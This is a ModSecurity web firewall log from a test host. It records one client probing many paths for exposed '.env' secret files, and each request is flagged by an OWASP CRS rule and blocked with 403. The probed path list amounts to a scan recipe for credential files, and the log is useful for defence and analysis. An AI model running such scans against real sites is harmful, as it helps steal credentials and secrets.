[Fri Nov 28 10:52:15.501853 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSlwz-haa_ABFroPvQ_clgAAABY"]
[Fri Nov 28 10:52:15.502038 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSlwz-haa_ABFroPvQ_clgAAABY"]
[Fri Nov 28 10:52:15.504079 2025] [:error] [pid 383779] [client 54.93.216.62:37106] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSlwz1Qi9n79E5A6Yecy1gAAABc"]
[Fri Nov 28 10:52:15.504301 2025] [:error] [pid 383779] [client 54.93.216.62:37106] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSlwz1Qi9n79E5A6Yecy1gAAABc"]
[Fri Nov 28 10:52:15.504493 2025] [:error] [pid 383779] [client 54.93.216.62:37106] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSlwz1Qi9n79E5A6Yecy1gAAABc"]
[Fri Nov 28 10:52:16.076969 2025] [:error] [pid 384065] [client 54.93.216.62:37278] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSlw0GNJq6bc-fJ7GQN8kQAAAAA"]
[Fri Nov 28 10:52:16.077237 2025] [:error] [pid 384065] [client 54.93.216.62:37278] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSlw0GNJq6bc-fJ7GQN8kQAAAAA"]
[Fri Nov 28 10:52:16.077443 2025] [:error] [pid 384065] [client 54.93.216.62:37278] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSlw0GNJq6bc-fJ7GQN8kQAAAAA"]
[Fri Nov 28 10:52:16.413031 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSlw0FkALeIJks_pKUvm3QAAABU"]
[Fri Nov 28 10:52:16.413263 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSlw0FkALeIJks_pKUvm3QAAABU"]
[Fri Nov 28 10:52:16.413447 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSlw0FkALeIJks_pKUvm3QAAABU"]
[Fri Nov 28 10:52:16.413603 2025] [:error] [pid 384066] [client 54.93.216.62:37424] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSlw0HkY7uSOKjkHHjTx0QAAAAM"]
[Fri Nov 28 10:52:16.413834 2025] [:error] [pid 384066] [client 54.93.216.62:37424] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSlw0HkY7uSOKjkHHjTx0QAAAAM"]
[Fri Nov 28 10:52:16.414023 2025] [:error] [pid 384066] [client 54.93.216.62:37424] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSlw0HkY7uSOKjkHHjTx0QAAAAM"]
[Fri Nov 28 10:52:16.606432 2025] [:error] [pid 384067] [client 54.93.216.62:37822] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSlw0N1sP_DH5i5fGun4VAAAAAQ"]
[Fri Nov 28 10:52:16.606718 2025] [:error] [pid 384067] [client 54.93.216.62:37822] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSlw0N1sP_DH5i5fGun4VAAAAAQ"]
[Fri Nov 28 10:52:16.606943 2025] [:error] [pid 384067] [client 54.93.216.62:37822] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSlw0N1sP_DH5i5fGun4VAAAAAQ"]
[Fri Nov 28 10:52:16.917573 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSlw0EM6gFne4-slYXlYegAAABI"]
[Fri Nov 28 10:52:16.917792 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSlw0EM6gFne4-slYXlYegAAABI"]
[Fri Nov 28 10:52:16.918007 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSlw0EM6gFne4-slYXlYegAAABI"]
[Fri Nov 28 10:52:17.112451 2025] [:error] [pid 384069] [client 54.93.216.62:38108] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSlw0adcGzopfH51_3odnAAAAAU"]
[Fri Nov 28 10:52:17.112724 2025] [:error] [pid 384069] [client 54.93.216.62:38108] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSlw0adcGzopfH51_3odnAAAAAU"]
[Fri Nov 28 10:52:17.112935 2025] [:error] [pid 384069] [client 54.93.216.62:38108] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSlw0adcGzopfH51_3odnAAAAAU"]
[Fri Nov 28 10:52:17.342414 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSlw0ehaa_ABFroPvQ_clwAAABY"]
[Fri Nov 28 10:52:17.342645 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSlw0ehaa_ABFroPvQ_clwAAABY"]
[Fri Nov 28 10:52:17.342861 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSlw0ehaa_ABFroPvQ_clwAAABY"]
[Fri Nov 28 10:52:17.816145 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSlw0VkALeIJks_pKUvm3gAAABU"]
[Fri Nov 28 10:52:17.816379 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSlw0VkALeIJks_pKUvm3gAAABU"]
[Fri Nov 28 10:52:17.816628 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSlw0VkALeIJks_pKUvm3gAAABU"]
[Fri Nov 28 10:52:18.054532 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSlw0kM6gFne4-slYXlYewAAABI"]
[Fri Nov 28 10:52:18.054764 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSlw0kM6gFne4-slYXlYewAAABI"]
[Fri Nov 28 10:52:18.054955 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSlw0kM6gFne4-slYXlYewAAABI"]
[Fri Nov 28 10:52:18.618024 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSlw0lkALeIJks_pKUvm3wAAABU"]
[Fri Nov 28 10:52:18.618236 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSlw0lkALeIJks_pKUvm3wAAABU"]
[Fri Nov 28 10:52:18.618489 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSlw0lkALeIJks_pKUvm3wAAABU"]
[Fri Nov 28 10:52:18.620492 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSlw0kM6gFne4-slYXlYfAAAABI"]
[Fri Nov 28 10:52:18.620735 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSlw0kM6gFne4-slYXlYfAAAABI"]
[Fri Nov 28 10:52:18.620943 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSlw0kM6gFne4-slYXlYfAAAABI"]
[Fri Nov 28 10:52:18.882313 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSlw0uhaa_ABFroPvQ_cmAAAABY"]
[Fri Nov 28 10:52:18.882566 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSlw0uhaa_ABFroPvQ_cmAAAABY"]
[Fri Nov 28 10:52:18.882780 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSlw0uhaa_ABFroPvQ_cmAAAABY"]
